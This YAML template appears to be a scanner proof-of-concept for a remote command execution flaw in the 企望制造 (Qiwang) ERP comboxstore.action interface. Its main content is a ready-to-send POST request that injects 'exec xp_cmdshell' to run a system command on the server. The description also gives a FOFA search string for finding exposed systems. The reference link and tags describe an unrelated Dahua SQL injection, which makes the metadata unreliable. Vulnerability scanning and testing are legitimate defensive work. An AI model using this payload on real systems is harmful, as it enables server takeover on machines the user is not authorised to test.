id: qiwang-erp-comboxstore-rce

info:
  name: 企望制造 ERP comboxstore.action 远程命令执行漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    企望制造 ERP comboxstore.action接口存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，执行任意命令
    FOFA: title="企望制造ERP系统"
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/大华/大华%20智慧园区综合管理平台%20getFaceCapture%20SQL注入漏洞.html
  tags: dahua,sqli
  created: 2023/08/13

rules:
  r0:
    request:
      method: POST
      path: /mainFunctions/comboxstore.action
      body: comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
    expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: r0()